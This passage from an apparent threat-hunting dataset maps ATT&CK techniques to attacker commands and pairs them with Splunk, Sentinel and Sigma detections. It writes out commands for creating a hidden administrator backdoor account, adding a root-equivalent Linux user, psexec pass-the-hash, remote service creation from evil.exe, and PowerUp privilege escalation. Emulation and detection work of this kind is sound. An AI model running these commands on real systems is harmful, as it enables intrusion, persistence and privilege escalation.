"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "Enable backdoor user account:\nnet user support_388945a0 /active:yes\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Enable backdoor user account:\nshell net user support_388945a0 /active:yes\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Net.exe user /add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe localgroup administrators * /add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe user * \\password \\domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe dsadd user", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/persistence/misc/add_netuser", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_useradd", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "useradd -M -N -r -s /bin/bash -c \"#{comment}\" #{username}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Category": "T1136", + "Built-in Windows Command": "Add backdoor user account:\nnet user support_388945a0 somepasswordhere /add /y\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Cobalt Strike": "Add backdoor user account:\nshell net user support_388945a0 somepasswordhere /add /y\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "Metasploit": "post/windows/manage/add_user_domain", + "Description": "Create a backdoor user account that often appears on windows systems and add that user to the local administrators group and the remote desktop users group. This combined with the sticky keys persistence grants an inocuous system level persistence mechanism." + }, + { + "Category": "T1136", + "Built-in Windows Command": "Enable backdoor user account:\nnet user support_388945a0 /active:yes\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Cobalt Strike": "Enable backdoor user account:\nshell net user support_388945a0 /active:yes\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "Metasploit": "", + "Description": "If the support_388945a0 account already exists on the system, but is disabled, you can enable it and then add it to the necessary groups." + }, + { + "chain_id": "100133", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "user /add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "chain_id": "100134", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "localgroup administrators * /add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "chain_id": "100135", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "user * \\password \\domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "chain_id": "100136", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "dsadd user", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "Empire Module": "powershell/persistence/misc/add_netuser", + "ATT&CK Technique #1": "T1136", + "ATT&CK Technique #2": "", + "Technique": "Create Account", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/add_netuser\": [\"T1136\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_useradd", + "ATT&CK Technique #1": "T1136", + "ATT&CK Technique #2": "", + "Technique": "Create Account", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_useradd\": [\"T1136\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"New-LocalUser\"or process_command_line contains \"net user add\")", + "name": "Create Account" + }, + { + "product": "Splunk", + "query": "index=main source=\"/var/log/secure\" eventtype=useradd | table user,host,src, UID, GID", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux source=\"/var/log/secure\" eventtype=userdel delete| table user,host", + "name": "" + }, + { + "product": "Splunk", + "query": "Root Account Creation: index=linux source=\"/var/log/secure\" eventtype=useradd UID=0 OR GID=0", + "name": "" + } + ], + "possible_detections": [ + "/var/log/secure with \"useradd\" and \"userdel\"", + { + "title": "Detects local user creation", + "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "status": "experimental", + "tags": [ + "attack.persistence", + "attack.t1136" + ], + "references": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/" + ], + "author": "Patrick Bareiss", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4720 + }, + "condition": "selection" + }, + "fields": [ + "EventCode", + "AccountName", + "AccountDomain" + ], + "falsepositives": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "level": "low" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account creation", + "description": "A user account was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "user" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "Lat. Mov. and Execution:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Lat. Mov. and Execution:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1077\nT1035", + "command_list": [ + "psexec is part of the SysInternals suite. It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:\n\npsexec /accepteula \\\\ip -u domain\\user -p password -c -f \\\\smbip\\share\\file.exe (Copy and execute file.exe on the remote system)\npsexec /accepteula \\\\ip -u domain\\user -p lm:ntlm cmd.exe /c dir c:\\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)\npsexec /accepteula \\\\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)", + "psexec COMP_NAME {listener name} (via sc)\npsexec_sh COMP_NAME {listener name} (via powershell)", + "PSEXEC Modules:\nexploit/windows/smb/psexec\nexploit/windows/local/current_user_psexec\nauxiliary/admin/smb/psexec_command\nauxiliary/scanner/smb/psexec_loggedin_users\nexploit/windows/smb/psexec_psh" + ], + "commands": [ + { + "command": "psexec is part of the SysInternals suite. It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:\n\npsexec /accepteula \\\\ip -u domain\\user -p password -c -f \\\\smbip\\share\\file.exe (Copy and execute file.exe on the remote system)\npsexec /accepteula \\\\ip -u domain\\user -p lm:ntlm cmd.exe /c dir c:\\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)\npsexec /accepteula \\\\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "psexec COMP_NAME {listener name} (via sc)\npsexec_sh COMP_NAME {listener name} (via powershell)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "PSEXEC Modules:\nexploit/windows/smb/psexec\nexploit/windows/local/current_user_psexec\nauxiliary/admin/smb/psexec_command\nauxiliary/scanner/smb/psexec_loggedin_users\nexploit/windows/smb/psexec_psh", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + } + ], + "parsed_datasets": [ + { + "Category": "T1077\nT1035", + "Built-in Windows Command": "psexec is part of the SysInternals suite. It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:\n\npsexec /accepteula \\\\ip -u domain\\user -p password -c -f \\\\smbip\\share\\file.exe (Copy and execute file.exe on the remote system)\npsexec /accepteula \\\\ip -u domain\\user -p lm:ntlm cmd.exe /c dir c:\\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)\npsexec /accepteula \\\\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)", + "Cobalt Strike": "psexec COMP_NAME {listener name} (via sc)\npsexec_sh COMP_NAME {listener name} (via powershell)", + "Metasploit": "PSEXEC Modules:\nexploit/windows/smb/psexec\nexploit/windows/local/current_user_psexec\nauxiliary/admin/smb/psexec_command\nauxiliary/scanner/smb/psexec_loggedin_users\nexploit/windows/smb/psexec_psh", + "Description": "psexec copies over a file to the remote box via SMB, then creates a service (usually a randomly named one) which points to the binary that was just copied over, starts the service, then deletes the service. Depending on the version of psexec, it might also migrate out of the initial process and delete the file that was copied over too. This is very similar to the previously mentioned technique of creating a service remotely, but the operator has much less control over the parameters" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "Approved for Public Release; Distribution Unlimited. Case Number 17-3569. \u00a92018 The MITRE Corporation. All Rights Reserved\n", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Approved for Public Release; Distribution Unlimited. Case Number 17-3569. \u00a92018 The MITRE Corporation. All Rights Reserved\n", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1044", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path", + "*.exe /grant Everyone:F /T /C /Q ", + "icacls.exe", + "python/situational_awareness/host/multi/SuidGuidSearch", + "python/situational_awareness/host/multi/WorldWriteableFileSearch" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "*.exe /grant Everyone:F /T /C /Q ", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "icacls.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "python/situational_awareness/host/multi/SuidGuidSearch", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/host/multi/WorldWriteableFileSearch", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1044", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + }, + { + "chain_id": "100125", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "/grant Everyone:F /T /C /Q ", + "sub_process_1": "icacls.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "file_systems_permissions_weakness", + "mitre_attack": "T1044", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "Empire Module": "python/situational_awareness/host/multi/SuidGuidSearch", + "ATT&CK Technique #1": "T1044", + "ATT&CK Technique #2": "", + "Technique": "File System Permissions Weakness", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/multi/SuidGuidSearch\": [\"T1044\"]," + }, + { + "Empire Module": "python/situational_awareness/host/multi/WorldWriteableFileSearch", + "ATT&CK Technique #1": "T1044", + "ATT&CK Technique #2": "", + "Technique": "File System Permissions Weakness", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/multi/WorldWriteableFileSearch\": [\"T1044\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 7 and (module_loaded contains \"\\\\Temp\\\\\"or module_loaded contains \"C:\\\\Users\\\\\"or driver_signature_status !contains \"Valid\")", + "name": "File System Permissions Weakness" + } + ], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1034", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path", + "powershell/privesc/powerup/allchecks" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/privesc/powerup/allchecks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1034", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + }, + { + "Empire Module": "powershell/privesc/powerup/allchecks", + "ATT&CK Technique #1": "T1034", + "ATT&CK Technique #2": "T1044", + "Technique": "Path Interception", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/allchecks\": [\"T1034\",\"T1044\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "8000-8027", + " 866", + "Whitelist Failures" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "IDs ???", + "Whitelist Failures" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1058", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + } + ], + "parsed_datasets": [ + { + "Category": "T1058", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ], + [ + "4657", + "Windows Registry" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1038", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path", + "powershell/privesc/powerup/find_dllhijack", + "powershell/privesc/powerup/write_dllhijacker" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/privesc/powerup/find_dllhijack", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/write_dllhijacker", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1038", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + }, + { + "Empire Module": "powershell/privesc/powerup/find_dllhijack", + "ATT&CK Technique #1": "T1038", + "ATT&CK Technique #2": "", + "Technique": "DLL Search Order Hijacking", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/find_dllhijack\": [\"T1038\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/write_dllhijacker", + "ATT&CK Technique #1": "T1038", + "ATT&CK Technique #2": "", + "Technique": "DLL Search Order Hijacking", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/write_dllhijacker\": [\"T1038\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ] + ], + "external_reference": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" + ] + }, + { + "technique_id": "T1035", + "command_list": [ + "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "!=wininit", + "services.exe", + "*.exe", + "pcalua.exe", + "\\\\Windows\\\\.+\\\\sc.exestart|create|query|config", + "\\SYSTEM\\CurrentControlSet\\services", + "\\SYSTEM\\CurrentControlSet\\services\\\\Windows\\\\.+\\\\lsass.exe|\\\\Windows\\\\.+\\\\svchost.exe", + "powershell/lateral_movement/invoke_psexec" + ], + "commands": [ + { + "command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "!=wininit", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "services.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "pcalua.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "\\\\Windows\\\\.+\\\\sc.exestart|create|query|config", + "source": "SysmonHunter - Service Execution", + "name": "" + }, + { + "command": "\\SYSTEM\\CurrentControlSet\\services", + "source": "SysmonHunter - Service Execution", + "name": "" + }, + { + "command": "\\SYSTEM\\CurrentControlSet\\services\\\\Windows\\\\.+\\\\lsass.exe|\\\\Windows\\\\.+\\\\svchost.exe", + "source": "SysmonHunter - Service Execution", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_psexec", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1035", + "Built-in Windows Command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Cobalt Strike": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "Metasploit": "", + "Description": "This technique creates a new service on the remote machine. It's important to note the spaces after the = in these commands! Also, before starting the service, run the following commands to make sure everything is set up properly:\nsc \\\\COMP qc acachsrv\ndir \\\\COMP\\ADMIN$\\acachsrv.exe" + }, + { + "chain_id": "100076", + "os": "windows", + "parent_process": "!=wininit", + "commandline_string": "", + "sub_process_1": "services.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "service_execution", + "mitre_attack": "T1035", + "itw_sample": "" + }, + { + "chain_id": "100124", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "pcalua.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "service_execution", + "mitre_attack": "T1035", + "itw_sample": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Sobnot.A" + }, + { + "name": "Service 